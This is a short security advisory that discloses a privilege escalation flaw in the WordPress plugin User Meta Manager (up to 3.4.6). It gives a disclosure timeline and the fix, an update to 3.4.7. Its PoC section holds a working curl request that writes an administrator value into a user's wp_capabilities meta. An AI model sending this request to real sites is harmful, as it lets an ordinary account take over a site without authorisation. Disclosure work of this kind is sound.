User Meta Manager [Privilege Escalation]
WordPress plugin User Meta Manager suffers for a Privilege Escalation vulnerability.
Description
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege escalation vulnerability. A registered user can modify the meta information of any registered user, including himself. This way he can modify wp_capabilities meta to escalate his account to a full privileged administrative account.
PoC
curl -c ${USER_COOKIES} \
-d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
&umm_meta_key[]=wp_capabilities" \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
Solution
Update to version 3.4.7
INFO
- 28 December 2015
- Pan Vag
- jasonlau.biz
- wordpress.org
- 3.4.6
- WordPress 4.4
TIMELINE
- 2015-12-29:
Vendor notified via support forums in WordPress.org - 2015-12-29:
Vendor notified via contact form in his site - 2015-12-30:
Requested a CVE ID - 2016-01-29:
WordPress security team notified about the issue - 2016-02-02:
Vendor released version 3.4.7 - 2016-02-02:
Verified that this exploit no longer applies in version 3.4.7 - 2016-02-05:
Requested a CVE ID (no response from 2015-12-30)